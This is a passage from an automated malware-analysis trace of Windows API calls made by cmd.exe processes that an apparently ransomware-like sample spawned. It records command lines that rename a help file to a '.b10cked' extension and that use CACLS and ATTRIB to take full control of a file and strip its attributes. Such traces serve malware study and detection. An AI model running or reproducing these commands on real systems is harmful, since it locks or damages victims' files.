lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x1, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x1, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x0, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x40, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x40, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x40, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.376] RegCloseKey (hKey=0x40) returned 0x0 [0196.376] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eaac | out: phkResult=0x12eaac*=0x40) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x40, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, 
lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x1, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x1, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x0, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x9, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x9, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x9, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.377] RegCloseKey (hKey=0x40) returned 0x0 [0196.377] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639e [0196.377] srand (_Seed=0x5b88639e) [0196.377] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"" [0196.377] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"" [0196.377] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 
0x18 [0196.378] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0196.378] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.378] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.378] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.378] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0196.378] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0196.378] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0196.378] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0196.378] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0196.378] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0196.378] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0196.378] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0196.378] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0196.378] GetEnvironmentStringsW () returned 0x1b22d0* [0196.379] FreeEnvironmentStringsW (penv=0x1b22d0) returned 1 [0196.379] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.379] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.379] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0196.379] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0196.379] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") 
returned 8 [0196.379] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0196.379] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0196.379] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0196.379] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0196.379] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0196.379] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f878 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.379] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f878, lpFilePart=0x12f874 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f874*="Desktop") returned 0x18 [0196.379] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.379] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f5f4 | out: lpFindFileData=0x12f5f4) returned 0x1b0010 [0196.379] FindClose (in: hFindFile=0x1b0010 | out: hFindFile=0x1b0010) returned 1 [0196.380] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f5f4 | out: lpFindFileData=0x12f5f4) returned 0x1b0010 [0196.550] FindClose (in: hFindFile=0x1b0010 | out: hFindFile=0x1b0010) returned 1 [0196.551] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f5f4 | out: lpFindFileData=0x12f5f4) returned 0x1b0010 [0196.551] FindClose (in: hFindFile=0x1b0010 | out: hFindFile=0x1b0010) returned 1 [0196.551] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.551] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0196.551] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0196.551] GetEnvironmentStringsW () returned 0x1b2af0* [0196.551] FreeEnvironmentStringsW (penv=0x1b2af0) 
returned 1 [0196.551] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.551] GetConsoleOutputCP () returned 0x1b5 [0196.552] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.552] GetUserDefaultLCID () returned 0x409 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f9b8, cchData=128 | out: lpLCData="0") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f9b8, cchData=128 | out: lpLCData="0") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f9b8, cchData=128 | out: lpLCData="1") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0196.553] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0196.553] GetConsoleTitleW (in: lpConsoleTitle=0x1a08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.554] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.554] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0196.554] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0196.554] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0196.554] _wcsicmp (_String1="move", _String2=")") returned 68 [0196.554] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0196.554] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0196.554] _wcsicmp (_String1="IF", _String2="move") returned -4 [0196.554] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0196.554] _wcsicmp (_String1="REM", _String2="move") returned 5 [0196.554] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0196.557] GetConsoleTitleW (in: lpConsoleTitle=0x12f6b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.557] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0196.557] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0196.557] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0196.557] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0196.557] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0196.557] _wcsicmp (_String1="move", _String2="CD") returned 10 [0196.557] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0196.557] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0196.557] _wcsicmp (_String1="move", _String2="REN") returned -5 [0196.558] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0196.558] _wcsicmp (_String1="move", _String2="SET") returned -6 
[0196.558] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0196.558] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0196.558] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0196.558] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0196.558] _wcsicmp (_String1="move", _String2="MD") returned 11 [0196.558] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0196.558] _wcsicmp (_String1="move", _String2="RD") returned -5 [0196.558] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0196.558] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0196.558] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0196.558] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0196.558] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0196.558] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0196.558] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0196.558] _wcsicmp (_String1="move", _String2="VER") returned -9 [0196.558] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0196.558] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0196.558] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0196.558] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0196.558] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0196.558] _wcsicmp (_String1="move", _String2="START") returned -6 [0196.558] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0196.558] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0196.558] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0196.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.559] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f46c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f464, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: 
lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f464*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", 
_String2="Program", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0196.561] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0196.561] _wcsicmp (_String1="HX_103~1.HXD", _String2=".") returned 58 [0196.561] _wcsicmp (_String1="HX_103~1.HXD", _String2="..") returned 58 [0196.561] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxd")) returned 0x2022 [0196.561] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.561] SetErrorMode (uMode=0x0) returned 0x0 [0196.561] SetErrorMode (uMode=0x1) returned 0x0 [0196.561] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", nBufferLength=0x104, lpBuffer=0x12edf4, lpFilePart=0x12eddc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", lpFilePart=0x12eddc*="HX_103~1.HXD") returned 0x27 [0196.561] SetErrorMode (uMode=0x0) returned 0x1 [0196.561] 
GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0196.561] _wcsicmp (_String1="HX_103~1.HXD", _String2=".") returned 58 [0196.561] _wcsicmp (_String1="HX_103~1.HXD", _String2="..") returned 58 [0196.562] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxd")) returned 0x2022 [0196.562] SetErrorMode (uMode=0x0) returned 0x0 [0196.562] SetErrorMode (uMode=0x1) returned 0x0 [0196.562] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", nBufferLength=0x104, lpBuffer=0x12f270, lpFilePart=0x12f008 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", lpFilePart=0x12f008*="HX_103~1.HXD") returned 0x27 [0196.562] SetErrorMode (uMode=0x0) returned 0x1 [0196.562] SetErrorMode (uMode=0x0) returned 0x0 [0196.562] SetErrorMode (uMode=0x1) returned 0x0 [0196.562] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked", nBufferLength=0x104, lpBuffer=0x12f478, lpFilePart=0x12f008 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked", lpFilePart=0x12f008*="Hx_1033_MValidator.HxD.b10cked") returned 0x39 [0196.562] SetErrorMode (uMode=0x0) returned 0x1 [0196.562] SetLastError (dwErrCode=0x0) [0196.562] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_1033_mvalidator.hxd.b10cked")) returned 0xffffffff [0196.562] GetLastError () returned 0x2 [0196.562] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", fInfoLevelId=0x1, lpFindFileData=0x12e984, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e984) returned 0x1a0e70 [0196.562] FindNextFileW (in: hFindFile=0x1a0e70, lpFindFileData=0x12e984 | out: lpFindFileData=0x12e984) returned 0 [0196.563] FindClose (in: 
hFindFile=0x1a0e70 | out: hFindFile=0x1a0e70) returned 1 [0196.563] GetLastError () returned 0x12 [0196.563] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", fInfoLevelId=0x1, lpFindFileData=0x12e984, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e984) returned 0x1a0e70 [0196.563] FindNextFileW (in: hFindFile=0x1a0e70, lpFindFileData=0x12e984 | out: lpFindFileData=0x12e984) returned 0 [0196.563] FindClose (in: hFindFile=0x1a0e70 | out: hFindFile=0x1a0e70) returned 1 [0196.563] GetLastError () returned 0x12 [0196.564] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", fInfoLevelId=0x1, lpFindFileData=0x1b1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1be0) returned 0x1a0e70 [0196.564] FindNextFileW (in: hFindFile=0x1a0e70, lpFindFileData=0x1b1be0 | out: lpFindFileData=0x1b1be0) returned 0 [0196.564] FindClose (in: hFindFile=0x1a0e70 | out: hFindFile=0x1a0e70) returned 1 [0196.564] GetLastError () returned 0x12 [0196.564] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", fInfoLevelId=0x1, lpFindFileData=0x1b1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1be0) returned 0x1a0e70 [0196.564] FindNextFileW (in: hFindFile=0x1a0e70, lpFindFileData=0x1b1be0 | out: lpFindFileData=0x1b1be0) returned 0 [0196.564] FindClose (in: hFindFile=0x1a0e70 | out: hFindFile=0x1a0e70) returned 1 [0196.564] GetLastError () returned 0x12 [0196.564] _get_osfhandle (_FileHandle=2) returned 0xb [0196.564] GetFileType (hFile=0xb) returned 0x2 [0196.657] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0196.657] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12eb54 | out: lpMode=0x12eb54) returned 1 [0196.658] _get_osfhandle (_FileHandle=2) returned 0xb [0196.658] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12eb88 | out: 
lpConsoleScreenBufferInfo=0x12eb88) returned 1 [0196.658] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.659] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ebc8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.659] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12ebac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ebac*=0x2c) returned 1 [0196.659] longjmp () [0196.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.659] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.660] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.660] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.660] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.660] SetConsoleInputExeNameW () returned 0x1 [0196.660] GetConsoleOutputCP () returned 0x1b5 [0196.660] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.660] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.660] exit (_Code=1) Process: id = "455" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"" cur_dir = 
"C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28949 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28950 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28951 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28952 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 28953 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28954 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28955 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 